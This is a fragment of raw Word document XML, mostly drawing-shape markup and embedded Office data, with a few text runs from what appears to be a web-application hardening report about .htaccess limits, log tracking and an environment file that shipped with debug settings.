                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126448"/>
                                  <a:pt x="808695" y="128687"/>
                                  <a:pt x="806835" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804976" y="132407"/>
                                  <a:pt x="802730" y="133338"/>
                                  <a:pt x="8001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46" name="Shape 1546"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1581149" y="523875"/>
                            <a:ext cx="866775" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862126" y="930"/>
                                  <a:pt x="863986" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4638"/>
                                  <a:pt x="866775" y="6890"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="126448"/>
                                  <a:pt x="865845" y="128687"/>
                                  <a:pt x="863986" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862126" y="132407"/>
                                  <a:pt x="859880" y="133338"/>
                                  <a:pt x="857250" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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53" name="Shape 1553"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="695325"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284819" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135973"/>
                                  <a:pt x="284819" y="138212"/>
                                  <a:pt x="282960" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225"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56" name="Shape 1556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1600200" y="695325"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282959" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284819" y="4638"/>
                                  <a:pt x="285749" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285749" y="135973"/>
                                  <a:pt x="284819" y="138212"/>
                                  <a:pt x="282959" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142863"/>
                                  <a:pt x="4649" y="141932"/>
                                  <a:pt x="2789" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138212"/>
                                  <a:pt x="0" y="135973"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="929" y="4638"/>
                                  <a:pt x="2789" y="2778"/>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7CF6A19" id="Group 28782" o:spid="_x0000_s1026" style="position:absolute;margin-left:312.7pt;margin-top:-28.75pt;width:192.75pt;height:66pt;z-index:-251424768" coordsize="24479,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&#10;AAAAsQsAAAAA&#10;">
                <v:shape id="Shape 1520" o:spid="_x0000_s1027" style="position:absolute;left:14001;width:5715;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5715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u3xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvQv/DMoXedFPBIqkbKYWqtCrW5tLbkJ0modnZkF1j/PfOQfA2w3vz3jeL5eAa1VMXas8GnicJ&#10;KOLC25pLA/nPx3gOKkRki41nMnChAMvsYbTA1Pozf1N/jKWSEA4pGqhibFOtQ1GRwzDxLbFof75z&#10;GGXtSm07PEu4a/Q0SV60w5qlocKW3isq/o8nZ8Bt9fyUH/a/iKvDuv3qi13/uTXm6XF4ewUVaYh3&#10;8+16YwV/NhV++UZG0NkVAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFYpLt8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l561975,v2630,,4875,930,6735,2791c570570,4651,571500,6890,571500,9525r,123825c571500,135973,570570,138212,568710,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2631,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4651,2790,2791,4650,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,571500,142875"/>
                </v:shape>
                <v:shape id="Shape 1524" o:spid="_x0000_s1028" style="position:absolute;left:11906;top:1809;width:6953;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="69532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NY3wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFHrTTeODkrpKK1QU8aAVeh2yYxKanQ3ZUeO/dwXB23x8z5nOO1erM7Wh8mzgfZCAIs69&#10;rbgwcPj96X+ACoJssfZMBq4UYD576U0xs/7COzrvpVAxhEOGBkqRJtM65CU5DAPfEEfu6FuHEmFb&#10;aNviJYa7WqdJMtEOK44NJTa0KCn/35+cAYvdcCdLGur08L39k/X16DaVMW+v3dcnKKFOnuKHe2Xj&#10;/HE6gvs38QQ9uwEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB9zNY3wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9526,l685801,v2630,,4874,930,6734,2778c694395,4638,695325,6890,695326,9525r,114300c695325,126454,694395,128699,692535,130547v-1860,1860,-4104,2791,-6734,2803l9526,133350v-2631,-12,-4876,-943,-6736,-2803c930,128699,,126454,1,123825l1,9525c,6890,930,4638,2790,2778,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695326,133350"/>
                </v:shape>
                <v:shape id="Shape 1533" o:spid="_x0000_s1029" style="position:absolute;left:14954;top:3524;width:6382;height:1333;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x0QwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JasMw&#10;EL0X8g9iAr01cpaW4EYxJpCQS6FNmvvEmlom1shIsuP+fVUo9DaPt86mGG0rBvKhcaxgPstAEFdO&#10;N1wr+Dzvn9YgQkTW2DomBd8UoNhOHjaYa3fnDxpOsRYphEOOCkyMXS5lqAxZDDPXESfuy3mLMUFf&#10;S+3xnsJtKxdZ9iItNpwaDHa0M1TdTr1VkB0PV037y+pcroI364Xr396dUo/TsXwFEWmM/+I/91Gn&#10;+c/LJfx+k06Q2x8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsI8dEMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l628650,v2629,,4875,930,6734,2778c637244,4638,638174,6890,638175,9525r,114300c638174,126454,637244,128699,635384,130559v-1859,1861,-4105,2791,-6734,2791l9525,133350v-2631,,-4876,-930,-6736,-2791c929,128699,,126454,,123825l,9525c,6890,929,4638,2789,2778,4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
                <v:shape id="Shape 1543" o:spid="_x0000_s1030" style="position:absolute;left:4953;top:5238;width:8096;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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cNsxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlBG+6qdpSUleJgUqgJ1NLexyy02xodjZktxr99V2h4G0e73PW28G24kS9bxwreJgnIIgr&#10;pxuuFRzfX2fPIHxA1tg6JgUX8rDdjEdrTLU784FOZahFDGGfogITQpdK6StDFv3cdcSR+3a9xRBh&#10;X0vd4zmG21YukuRJWmw4NhjsKDdU/ZS/VsHqat72X3lx/HCfRakveUZ2lyk1nQzZC4hAQ7iL/92F&#10;jvMfV0u4fRNPkJs/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHPxw2zEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l800100,v2630,,4876,930,6735,2778c808695,4638,809625,6890,809625,9525r,114300c809625,126448,808695,128687,806835,130547v-1859,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,133350"/>
                </v:shape>
                <v:shape id="Shape 1546" o:spid="_x0000_s1031" style="position:absolute;left:15811;top:5238;width:8668;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8667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4XwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/dSsMw&#10;FL4f+A7hCN4Ml07n2GqzIYIwZTeuPsAhOW2qzUlJ4lrf3gjC7s7H93uq/eR6caYQO88KlosCBLH2&#10;puNWwUf9crsBEROywd4zKfihCPvd1azC0viR3+l8Sq3IIRxLVGBTGkopo7bkMC78QJy5xgeHKcPQ&#10;ShNwzOGul3dFsZYOO84NFgd6tqS/Tt9OwT0dRxfmb6+8/az1IempXjZWqZvr6ekRRKIpXcT/7oPJ&#10;8x9Wa/j7Jp8gd78AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA1y/uF8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9526,l857250,v2630,,4876,930,6736,2778c865845,4638,866775,6890,866775,9525r,114300c866775,126448,865845,128687,863986,130547v-1860,1860,-4106,2791,-6736,2803l9526,133350v-2631,-12,-4876,-943,-6736,-2803c930,128687,,126448,1,123825l1,9525c,6890,930,4638,2790,2778,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,866775,133350"/>
                </v:shape>
                <v:shape id="Shape 1553" o:spid="_x0000_s1032" style="position:absolute;top:6953;width:2857;height:1429;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88wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VjZZIia4iVaE9CDXV+5Ads8HsbJpdY+yv7xYEb/N4nzNf9rYWHbW+cqxgPEpAEBdO&#10;V1wqOHxvX95A+ICssXZMCm7kYbkYPM0x0+7Ke+ryUIoYwj5DBSaEJpPSF4Ys+pFriCN3cq3FEGFb&#10;St3iNYbbWk6SZCotVhwbDDb0bqg45xerYNfUVZDp5vyz2+fmdvxaf3brX6Weh/1qBiJQHx7iu/tD&#10;x/lp+gr/38QT5OIPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8SRvPMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l276225,v2630,,4875,930,6735,2778c284819,4638,285750,6890,285750,9525r,123825c285750,135973,284819,138212,282960,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:shape id="Shape 1556" o:spid="_x0000_s1033" style="position:absolute;left:16002;top:6953;width:2857;height:1429;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8ykwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlBG+6aSEiqatItVAPgqbtfciO2WB2Nma3MfbXdwXB2zze5yxWva1FR62vHCt4mSYgiAun&#10;Ky4VfH99TOYgfEDWWDsmBTfysFoOBwvMtLvykbo8lCKGsM9QgQmhyaT0hSGLfuoa4sidXGsxRNiW&#10;Urd4jeG2lq9JMpMWK44NBht6N1Sc81+rYN/UVZDp9nzZH3Nz+zlsdt3mT6nxqF+/gQjUh6f44f7U&#10;cX6azuD+TTxBLv8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4VPMpMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l276225,v2630,,4875,930,6734,2778c284819,4638,285749,6890,285750,9525r,123825c285749,135973,284819,138212,282959,140072v-1859,1860,-4104,2791,-6734,2803l9525,142875v-2631,-12,-4876,-943,-6736,-2803c929,138212,,135973,,133350l,9525c,6890,929,4638,2789,2778,4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;Files&gt; </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&lt;Directory&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are frequently disabled in shared-hosting contexts. Logs removed from tracking</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gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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extended. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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copy.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> renamed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to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.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and hardened: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">it shipped </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APP_ENV=local</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APP_DEBUG=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
